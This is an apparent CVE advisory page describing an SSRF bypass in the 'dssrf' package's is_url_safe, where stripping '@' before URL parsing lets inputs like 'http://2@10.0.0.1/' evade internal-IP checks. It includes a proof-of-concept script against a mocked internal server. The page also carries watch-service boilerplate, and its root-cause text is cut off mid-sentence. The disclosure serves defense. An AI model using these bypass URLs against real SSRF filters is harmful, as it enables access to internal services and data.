CVE-2026-54722
Summary
is_url_safe in v1.0.3 contains an SSRF bypass. remove_at_symbol_in_string is applied to the raw URL string before new URL() parses it. This strips the @ that separates userinfo from host, corrupting the hostname so internal IPs are never checked.
Vulnerability
In helpers.ts, is_url_safe does:
u = remove_at_symbol_in_string(u); // strips ALL '@' from the raw string
// ...
const parsed = new URL(u);
const hostname = parsed.hostname; // resolved from the corrupted string
What happens step by step
Input: http://evil.com@127.0.0.1/
1. remove_at_symbol_in_string → http://evil.com127.0.0.1/
2. new URL(...) → hostname = "evil.com127.0.0.1"
3. Not a bare IP, not IPv6 → passes all IP checks
4. is_hostname_resolve_to_internal_ip("evil.com127.0.0.1") → NXDOMAIN → returns false
5. Result: true (safe) — but any HTTP client using the *original* URL connects to 127.0.0.1
Proof of Concept
import nock from 'nock';
import { got } from 'got';
import { is_url_safe } from 'dssrf';
// Simulate an internal server at 10.0.0.1 that returns secret data
nock('http://10.0.0.1:80').persist().get('/').reply(200, 'SECRET_DATA');
const BYPASS_URL = 'http://2@10.0.0.1/';
const PLAIN_URL = 'http://10.0.0.1/';
// dssrf should block both — it only blocks the plain one
console.log('--- dssrf validator ---');
console.log(is_url_safe('${PLAIN_URL}') =, await is_url_safe(PLAIN_URL), '← correctly blocked');
console.log(is_url_safe('${BYPASS_URL}') =, await is_url_safe(BYPASS_URL), '← ⚠️ BYPASSED (should be false)');
// HTTP client with the bypass URL — gets SECRET_DATA back from 10.0.0.1
console.log('\n--- HTTP client ---');
try {
const res = await got(BYPASS_URL, { retry: { limit: 0 } });
console.log(got('${BYPASS_URL}') response:, res.body, '← ⚠️ VULNERABLE');
} catch (e) {
console.log(got('${BYPASS_URL}') blocked:, e.message);
}
Root Cause
@ in a URL separates userinfo (credentials) from host. Stripping it from the raw string before parsing destroys that boundary. The fix is to rej
⚡ Watch CVE-2026-54722
Get an email if CVE-2026-54722 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Exploitation outlook
- Low exploitation risk0.33% 30-day exploitation probability — currently an unlikely target, but scores change as exploit code circulates. Riskier than 25% of all EPSS-scored CVEs.
Advisory coverage (2)
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-54722)